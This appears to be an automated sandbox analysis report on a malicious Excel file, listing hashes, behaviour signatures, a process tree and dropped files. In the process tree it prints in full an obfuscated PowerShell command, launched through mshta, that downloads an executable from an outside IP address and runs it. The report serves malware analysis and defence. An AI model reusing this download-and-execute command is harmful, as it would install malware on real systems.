Analysis

  • max time kernel
    139s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 02:46

General

  • Target

    aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls

  • Size

    1.1MB

  • MD5

    8f3c11affc3d0195c96e4d1e4478e29c

  • SHA1

    daad41a948964394469ac56db60e102515fe938f

  • SHA256

    aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf

  • SHA512

    194efa4322ad42523eb4a8bfca941388eb645dde024712cbef2bd106d88407ff6f67ad3e6ddfdc8cbe7e7ba98a3fc6928092920c62d2b326e1bbb3b9784d0fa2

  • SSDEEP

    24576:Uq9PLiijE2Z5Z2am8VcYjgxPF84LJQodsJU1BnBsk7LRXA2r:UEPLiij7Z5ZK8VcYMpFjLJQodH1BXPR9

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2360
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
      "C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2476
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:876
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:768
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1992
      • C:\Users\Admin\AppData\Roaming\wlanext.exe
        "C:\Users\Admin\AppData\Roaming\wlanext.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Windows\SysWOW64\svchost.exe
          "C:\Users\Admin\AppData\Roaming\wlanext.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:2124

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

    Filesize

    504B

    MD5

    fca2d4075e78fd8330d5590ee560451b

    SHA1

    b7ab976b0f45facd4a29a6aded52515523cd756b

    SHA256

    9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689

    SHA512

    f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    8cea8ad0055cfa7e2996bb974d07439d

    SHA1

    0f79068cf7f28aa67c12849457f6b73eb319125a

    SHA256

    975a4049d9052d356d7e8b98a12d146bb9f006e76df36ba7dbe4d265078e191a

    SHA512

    68dbc1e3cad1c472490000cbe5c9f0f5fb053ca0ed50fad15fc91144c5f4cddc2b8bf0df1db4802d13f45be366065de08b26784e3ff32bb1a5980be4db34f87a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

    Filesize

    554B

    MD5

    278f2c9dc15ca7c48785ffb7a522f3b6

    SHA1

    826e17b66ae225807c37f1534623ee2120cf3666

    SHA256

    67a45783638fa4692d0d52305b3e2d4dd64dfddce09b049d64c8942b9a561661

    SHA512

    4c3f6e4f8d0c788b608fc73163c669e2b894ea9068fc01ba21187eeb924f2d203280250b5ca55d665c9e44a3806d952e3b375e7414a747423b40c484e5234ecb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethebestthingswithgreatthingsbestthingswithgreatentry[1].hta

    Filesize

    8KB

    MD5

    03ebca3f0b4171e32b0689a3410e79ad

    SHA1

    1e7b517e45f1b0e503e796bb6dcc7a6252f35364

    SHA256

    1d3307d98ef8b5e0743dc753388a3b8698a52783338bf8fe49042ad62ad98732

    SHA512

    a7b84ce6572f3e820cffe438c771b5c3bdd140fca78edb7d6a7217bb7bf57950168d025f5c6e634e482a4a99576367ada72e3d9e26891ab03901136f9ed74270

  • C:\Users\Admin\AppData\Local\Temp\CabB210.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp

    Filesize

    1KB

    MD5

    ceff02079ffeba9fe9071e2a8dc5c60b

    SHA1

    8ef32fde3068d74ff260594f4e81a9e722dd9c8a

    SHA256

    f2701121bba43e22f733ad8d9c0bc503b547f21fc95d352ca10d0819f7a32d0d

    SHA512

    8e0bcc1700b9ba4ec01d04baed103bb8c5a573b3aa2382eb4ef3ce0b194312314971542ec7399fe2a767da070ac0e3d8002f11c6bda0d3b7724c5d8823ee4f74

  • C:\Users\Admin\AppData\Local\Temp\juvenilely

    Filesize

    283KB

    MD5

    5fc0e7bec89d9a4e021d88dd1cf731b2

    SHA1

    26ea02938cb1eb51a1ac601ab1b068a130cc3719

    SHA256

    532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d

    SHA512

    1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f

  • C:\Users\Admin\AppData\Local\Temp\lxzluzp.zip

    Filesize

    484KB

    MD5

    3bcbd3b08e4a8843fda34512623960a2

    SHA1

    244d3df69bbc09a43d4af3de5165f50506b8d7af

    SHA256

    7db638aa6b205aadba193dc7803a7e73eb07bbeeacbacad3a65978093e78673c

    SHA512

    914f366aab61ed2c13a87ee07e6a4b7aeffe4689c28014fab786244127852a19b7c1ae58bd8dd11840415035290373922f39b628c2409f68569cbf0b8a57e639

  • C:\Users\Admin\AppData\Local\Temp\tnpx6mte.dll

    Filesize

    3KB

    MD5

    1a216f7b4404a7e76e9224ad3f4d0579

    SHA1

    97954f49e9a8c8b54c1542a8f916972443e5b389

    SHA256

    e257a1620aa98b569bcdb75cedbf2552f3d0a3e49df71007dc2a64526d15bb02

    SHA512

    45c7dc8ebd845f46931019b378a8a8333238adf77e73ad3c71be4843a11b6cdad56718d31adb08b6e1ac52f46966ab15c4664f281978238812a8a35fc3ff40a4

  • C:\Users\Admin\AppData\Local\Temp\tnpx6mte.pdb

    Filesize

    7KB

    MD5

    7b95801062f5d47de9cc5e59dcc10462

    SHA1

    6d7e58750a67f796d6441a84538f32b0d481a95e

    SHA256

    1108177b5dac0f3dbb5fef753d33ff281e4a8015184b8962005c2f67eb12f009

    SHA512

    e6253dfef719f52fc44e88d2c26bccd168d1bc7aef5266cd7a39b9ccf67df83c7483f53b066fe1cf1715f4af70c9e51f9b3d76ed5b451854e891a02cf587375d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    c25ae41143a3dc8db0136cd00b75e178

    SHA1

    c0c8d88e62eb1b3e759677512ed50a320df32479

    SHA256

    73d82479177fd2cf7b7c493b7120035eeb3f17e3eba5973ee427194cd201c754

    SHA512

    3d5e96b136faaab56f24f9fc216f30d418915169600e9a90ab934804f2f2ff8939e490f3098be3141fcde8b0ff151c6179c9ce7160b57f8e1c77e9b32d2ec8fe

  • C:\Users\Admin\AppData\Roaming\wlanext.exe

    Filesize

    946KB

    MD5

    7423e3013a2ca93513e9f1024dfe1cc8

    SHA1

    525281537f75c168ca4015df438bb83a7784931a

    SHA256

    8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df

    SHA512

    d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp

    Filesize

    652B

    MD5

    5c851f4b3a74dc8112c0363e7a4c058b

    SHA1

    9efc91ddaf92b054bc744fce8fa49abb8487d06e

    SHA256

    c1f74a6fbb7152496a27ecb896ecc310c624f4672024766f3b7b6bac32957fab

    SHA512

    c5f9f6313edf4ef0055a0dd39191a0a70c4f9f51f2b6a7667a4a30e759d65f31a8817492ee53863e93f9750386db9cc399fefc55e5a2a53be15cdd0691cf2e4d

  • \??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.0.cs

    Filesize

    473B

    MD5

    4af98cbe7b888e1e92e1aa8a35732223

    SHA1

    75d54c91355c97fc9b1c3453efea5dccd817ed42

    SHA256

    596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34

    SHA512

    1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

  • \??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline

    Filesize

    309B

    MD5

    cb25a753d2162468e70eb450ff86d8ed

    SHA1

    994be0e177cc763e04068fffea58d20e30dd327f

    SHA256

    52dafc3b411fc1f3f717745ef1c76029cae193d7fb6777f4c67cef223824fdd2

    SHA512

    b396add7928624ee470ed5fd66197222a0192a732054bdac5b0690587e2272e209e3ee91c57b26649527b158940c4538d63c494d7a2457f8bf1508fc9d0216cb

  • \Users\Admin\AppData\Local\Temp\sqlite3.dll

    Filesize

    922KB

    MD5

    dda1b03a5cd2ca37c96b7daf5e3a8ed7

    SHA1

    c70e5f58e61980d39608f0795879bf012dbbbca2

    SHA256

    79f86c1edbbc69652a03a0f5667b3985bcf1e19f16fa3b8c7934e5b97ab8586d

    SHA512

    bf83648c9b5d6d65b2c8409d262a1b7421d2cb13d6c759ec5f352c2d1c5adff3ee2395250fbdfe3590f25fe96bf6b40c2d82a8e7eecaab03be2e6a398e83981f

  • memory/2124-79-0x0000000000400000-0x0000000000447000-memory.dmp

    Filesize

    284KB

  • memory/2360-81-0x0000000000080000-0x00000000000C4000-memory.dmp

    Filesize

    272KB

  • memory/2360-80-0x0000000000080000-0x00000000000C4000-memory.dmp

    Filesize

    272KB

  • memory/2360-119-0x0000000000080000-0x00000000000C4000-memory.dmp

    Filesize

    272KB

  • memory/2360-120-0x0000000061E00000-0x0000000061ED2000-memory.dmp

    Filesize

    840KB

  • memory/2732-16-0x0000000002100000-0x0000000002102000-memory.dmp

    Filesize

    8KB

  • memory/3048-56-0x000000007259D000-0x00000000725A8000-memory.dmp

    Filesize

    44KB

  • memory/3048-1-0x000000007259D000-0x00000000725A8000-memory.dmp

    Filesize

    44KB

  • memory/3048-82-0x0000000007550000-0x0000000007679000-memory.dmp

    Filesize

    1.2MB

  • memory/3048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/3048-17-0x0000000002D30000-0x0000000002D32000-memory.dmp

    Filesize

    8KB